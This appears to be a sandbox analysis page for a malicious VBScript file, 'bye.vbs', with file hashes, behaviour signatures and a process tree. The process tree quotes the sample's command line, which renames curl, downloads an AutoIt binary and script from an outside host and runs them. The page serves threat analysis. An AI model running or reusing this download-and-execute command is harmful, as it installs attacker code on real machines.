Overview

overview

10

Static

static

1

bye.vbs

windows7-x64

8

bye.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    03/10/2023, 01:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bye.vbs

  • Size

    87KB

  • MD5

    c203856ba9d7f9a78341114422c1e72d

  • SHA1

    db4cd591b107d23e95f52148c42bd7bf272b7b82

  • SHA256

    713640bdfeb056cda0283464f5e1e85dd8ff7ecfdbe436fec5e22d86a052e3ef

  • SHA512

    1d0cd5134262b12fbed2e742e309569370d7eae16e2d8d58f55b083bcae7a108c0096b5691cc2fb061ca90e6b3226a1dd261399c5ef961c909615f49a6ae29f8

  • SSDEEP

    1536:vDgcLZK8HLHQj2Bks7wrzeABf2v60QL4mW+0rURc:bgerwj2Bk3z7doMxW+0Ec

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bye.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir c:\efod & cd /d c:\efod & copy c:\windows\system32\curl.exe efod.exe & efod -H "User-Agent: curl" -o Autoit3.exe http://searcherbigdealk.com:2351 & efod -o yqzlpy.au3 http://searcherbigdealk.com:2351/msiefodhrst & Autoit3.exe yqzlpy.au3
      2⤵
        PID:1756

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads